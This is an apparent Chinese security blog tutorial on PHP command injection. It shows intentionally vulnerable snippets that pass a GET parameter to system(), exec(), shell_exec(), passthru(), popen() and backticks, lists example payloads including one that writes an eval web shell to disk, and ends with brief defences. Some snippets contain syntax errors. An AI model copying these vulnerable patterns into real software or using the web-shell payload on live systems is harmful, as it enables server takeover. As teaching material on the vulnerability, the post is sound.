命令注入

最新推荐文章于 2023-02-14 15:45:16 发布
最新推荐文章于 2023-02-14 15:45:16 发布
阅读量441 收藏
点赞数
分类专栏: 漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51075988/article/details/114793460
版权

命令执行注入

当应用需要调用一些外部执行程序时(系统的命令 或者是
exe等可执行文件),如果将用户的输入作为系统命令的参数拼接到命令当中,可能存在命令执行漏洞。

条件

1.将用户的输入作为拼接的命令
2.无足够的过滤

危害
相关函数
system()  将 字符串 作为 OS命令 去执行,并且自带输 出功能
<?php
if(isset($_GET['cmd'])){
     $str = $_GET['cmd'];
     system($str);
}
?>

exec()   将 字符串 作为 OS命令 去执行,但是自身 不带输 出功能,需要 写入 输出功能的代码
<?php
if(isset($_GET['cmd'])){
     $str = $_GET['cmd'];
     print(exec($str);  
}
?>
注意:该函数能够执行系统命令,但是返回结果是有限度的(即返回不全)

shell_exec()  不自带输出功能
<?php
if(isset($_GET['cmd'])){
     $str = $_GET['cmd'];
     print(shell_exec($str);  
}
?>

passthru()  自带输出功能
<?php
if(isset($_GET['cmd'])){
     $str = $_GET['cmd'];
     passthru($str);
}
?>

popen()  可执行 OS命令,但是不能直接返回命令结果,而是返回了一个文件指针
<?php
if(isset($_GET['cmd'])){
     $cmd = $_GET['cmd'].">>1.txt";
     popen($cmd,'r');
}
?>

反引号 ``,内的字符串 会被当作 OS命令去执行
<?php
if(isset($_GET['cmd'])){
   $cmd = $_GET['cmd'];
   print `$cmd`;
}
?>
常用利用
查看系统文件  ?cmd=type c:\Windows\system32\drivers\etc\hosts
显示当前路径  ?cmd=cd
写文件       ?cmd=echo "<?php @eval($_POST[111]); ?>" > d:\phpstudy_pro\sql\shell.php
防御

1.可在 php.ini 中对函数进行禁用
2.对用户能够提交的命令 参数 进行过滤
3.参数值最好使用引号包裹,还可在执行之前 使用一些函数(例如:addslashes()) 对其进行转义

执昔
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
命令注入讲解ppt.pptx
08-10
命令注入的一些基础知识讲解
(4)5位可控字符下的任意命令执行-----另一种解题方法
大方子
11-06 3272
有道分享链接:https://note.youdao.com/ynoteshare1/index.html?id=55e53db4f857d81515e57e104777b88b&type=note 前言: 题目是hitcon-ctf-2017的babyfirst-revenge,之前是针对babyfirst-revenge-v2来进行学习研究的 <?php ...
CTFshow——web入门——php特性(下篇)
h_adam的博客
02-06 5435
web入门——php特性web123web125web126 web123 题目 <?php error_reporting(0); highlight_file(__FILE__); include("flag.php"); $a=$_SERVER['argv']; $c=$_POST['fun']; if(isset($_POST['CTF_SHOW'])&&isset($_POST['CTF_SHOW.COM'])&&!isset($_GET['fl0g']))
5位可控字符下的任意命令执行 - 另一种解题方法
Ms08067安全实验室
11-25 1220
本文作者:是大方子(Ms08067实验室核心成员)﹀﹀﹀01前言题目是hitcon-ctf-2017的babyfirst-revenge,之前是针对babyfirst-revenge-v...
CTF中字符长度限制下的命令执行 rce(7字符5字符4字符)汇总
热门推荐
Love&Share
10-21 1万+
七字符rce 源码 <?php highlight_file(__FILE__); if(strlen($_GET[1]<7)){ echo strlen($_GET[1]); echo '<hr/>'; echo shell_exec($_GET[1]); }else{ exit('too long'); } ?> #写入语句 <?php eval($_GET[1]); #base64编码后 PD9waHAgZXZhbCgkX0dFV
CTF-web 第十三部分 命令注入
iamsongyu的博客
11-25 1万+
一 、基本原理 命令注入指的是,利用没有验证过的恶意命令或代码,对网站或服务器进行渗透攻击。 注入有很多种,并不仅仅只有SQL注入。比如: 命令注入(Command Injection) Eval 注入(Eval Injection) 客户端脚本攻击(Script Insertion) 跨网站脚本攻击(Cross Site Scripting, XSS) SQL 注入攻击(SQL ...
反弹shell以及常见的反弹Shell语句原理
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
10-31 465
什么是反弹shell?原词为reverse shell,含义如下 控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。 其本质就是实现客户端与服务端的互换 反弹shell利用原因 初学时我们不禁有这样的疑问,为什么我们要用反弹shell呢?我们时候利用反弹shell呢?解释如下 为什么要用反弹shell 这里不以CTF举例,以相对更真实一点的渗透过程来举例,比如你作为攻击方,成功向目标处上传了木马文件,可以执行一些语句,我们想获取一个可以直接操作主机的虚拟终端,这个时
BUUCTF[ctf473831530_2018_web_virink_web]
qq_62078839的博客
06-12 761
文件存储路径就是md5(orange.ip)限制字符写shell 参考文章CTF-web 第十三部分 命令注入 成功写入shell通过上面的脚本写入shell,连上蚁剑 看一下主机信息 这里并没有看到内网ip,换个姿势 试了一下这里面的ip都没有开放端口,再经过Article_kelp师傅的帮助下,扫描到了ip 9000对应php-fpm,873对应nsync我们可以自己构造fastcgi协议,和fpm进行通信参考文章Fastcgi协议分析 && PHP-FPM未授权访问漏洞 && Exp
web安全-命令执行漏洞
weixin_61956136的博客
07-25 1871
web安全-命令执行漏洞
命令执行中对字符长度限制的绕过解析
weixin_59419135的博客
02-14 1008
命令执行中对字符长度限制的绕过解析,对限制长度为7,5,4的字符过滤进行绕过
cat 刷题经历(命令执行)
qq_62046696的博客
07-04 654
目录我幽默码ENV 命令执行之我在干什么 命令执行之我是谁命令执行之我在哪webshell 无字符Webshell打开源码,主页面啥都没有一个棋盘, 看#1部分,上面一行是顺序,下面一行是对应棋盘的坐标,比如null对应?,z1对应的字母是o位置是2,以此类推结果是?source,就想到这个应该是给url后面加一个?source但是传什么不清楚,那就随便传个?source=1看看,结果出现了源码,源码如下: 这时候,感觉唯一可以利用的就是else后面的$a = $_POST['a'];
python的常见命令注入威胁
12-25
不过下面可是我们开发产品初期的一些血淋淋的案例,更多的安全威胁可以看看北北同学的《python hack》PPT,里面提及了不只命令执行的威胁,那些都是我们亲身经历的代码。 千万要记得执行命令的时候,不要信任其他...
详解php命令注入攻击
10-17
主要介绍了php命令注入攻击,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧
c语言开发图书管理系统项目源码+数据+可运行程序
05-01
c语言开发图书管理系统项目源码+数据+可运行程序 主要功能有:1、以管理员或读者不同身份注册账户。2、登录、找回密码、修改密码。3、管理员:图书入库,清除库存,统计书籍数量,统计读者借书情况,在馆书籍排序,读者排序。4、读者:查看个人借阅信息,借书,还书,按书名、作者、出版社检索图书,查询全部在馆图书。
基于transformer的多模态脑肿瘤分割.zip
最新发布
05-01
本项目旨在利用Transformer模型实现多模态脑肿瘤分割。多模态脑肿瘤分割对于脑肿瘤的诊断和治疗具有重要意义。 我们采用Transformer模型,通过分析脑部MRI、CT、PET等不同模态的医学影像数据,实现对脑肿瘤区域的自动分割。项目使用的数据集包括公开的脑肿瘤影像数据集,如BRATS、Medical Segmentation Decathlon等,并进行了预处理,包括图像增强、分割和特征提取等。 在运行环境方面,我们使用Python编程语言,基于TensorFlow、PyTorch等深度学习框架进行开发。为了提高计算效率,我们还使用了GPU加速计算。此外,我们还采用了Docker容器技术,确保实验结果的可重复性。 项目完成后,将实现对多模态脑肿瘤的快速、准确分割,为脑肿瘤的诊断和治疗提供有力支持。同时,项目成果也可应用于其他医学影像分析领域。
马尔文高浓度池说明书 High Concentration Cell (ZEN1010)
05-01
马尔文高浓度池说明书 High Concentration Cell (ZEN1010)
如何提高APP商业变现能力.docx
05-01
如何提高APP商业变现能力.docx
node-v12.20.0-darwin-x64.tar.xz
05-01
Node.js,简称Node,是一个开源且跨平台的JavaScript运行时环境,它允许在浏览器外运行JavaScript代码。Node.js于2009年由Ryan Dahl创立,旨在创建高性能的Web服务器和网络应用程序。它基于Google Chrome的V8 JavaScript引擎,可以在Windows、Linux、Unix、Mac OS X等操作系统上运行。 Node.js的特点之一是事件驱动和非阻塞I/O模型,这使得它非常适合处理大量并发连接,从而在构建实时应用程序如在线游戏、聊天应用以及实时通讯服务时表现卓越。此外,Node.js使用了模块化的架构,通过npm(Node package manager,Node包管理器),社区成员可以共享和复用代码,极大地促进了Node.js生态系统的发展和扩张。 Node.js不仅用于服务器端开发。随着技术的发展,它也被用于构建工具链、开发桌面应用程序、物联网设备等。Node.js能够处理文件系统、操作数据库、处理网络请求等,因此,开发者可以用JavaScript编写全栈应用程序,这一点大大提高了开发效率和便捷性。 在实践中,许多大型企业和组织已经采用Node.js作为其Web应用程序的开发平台,如Netflix、PayPal和Walmart等。它们利用Node.js提高了应用性能,简化了开发流程,并且能更快地响应市场需求。
描述命令注入命令注入的条件
06-06
命令注入(Command Injection)是一种常见的网络攻击技术,攻击者通过在受攻击的应用程序中注入恶意命令来执行非法操作,例如执行系统命令、读取敏感文件或者篡改数据等。 命令注入的条件主要包括以下几个方面: 1...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值